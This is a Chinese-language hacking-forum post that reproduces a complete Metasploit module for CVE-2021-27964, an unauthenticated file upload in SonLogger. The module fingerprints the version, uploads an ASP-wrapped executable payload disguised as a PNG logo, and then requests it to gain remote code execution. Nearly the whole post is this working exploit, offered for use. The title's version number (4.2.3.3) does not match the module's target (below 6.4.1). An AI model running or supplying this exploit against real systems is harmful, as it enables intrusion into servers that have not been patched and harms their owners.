跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload
          via insecure POST request. It has been tested on version < 6.4.1 in
          Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
          ],
        'References' =>
          [
            ['CVE', '2021-27964'],
            ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
          ],

        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' =>
          [
            [
              'SonLogger < 6.4.1',
              {
                'Platform' => 'win'
              }
            ],
          ],
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
      ]
    )
  end

  def check_product_info
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
  end

  def check
    begin
      res = check_product_info

      unless res
        return CheckCode::Unknown('Target is unreachable.')
      end

      unless res.code == 200
        return CheckCode::Unknown("Unexpected server response: #{res.code}")
      end

      version = Gem::Version.new(JSON.parse(res.body)['Version'])

      if version < Gem::Version.new('6.4.1')
        CheckCode::Vulnerable("SonLogger version #{version}")
      else
        CheckCode::Safe("SonLogger version #{version}")
      end
    rescue JSON::ParserError
      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
    end
  end

  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  def exploit
    begin
      print_good('Generate Payload')
      data = create_payload

      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
      post_data = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
      post_data << "Content-Type: image/png\r\n"
      post_data << "\r\n#{data}\r\n"
      post_data << "--#{boundary}\r\n"

      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'data' => post_data,
        'headers' => {
          'Accept' => 'application/json',
          'Accept-Language' => 'en-US,en;q=0.5',
          'X-Requested-With' => 'XMLHttpRequest'
        }
      )
      unless res
        fail_with(Failure::Unreachable, 'No response from server')
      end

      unless res.code == 200
        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
      end

      json_res = begin
        JSON.parse(res.body)
      rescue JSON::ParserError
        nil
      end

      if json_res.nil? || json_res['Message'] == 'Error in saving file'
        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
      end

      print_good('Payload has been uploaded')

      handler

      print_status('Executing payload...')
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
        'method' => 'GET'
      }, 5)
    end
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
  end
end
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...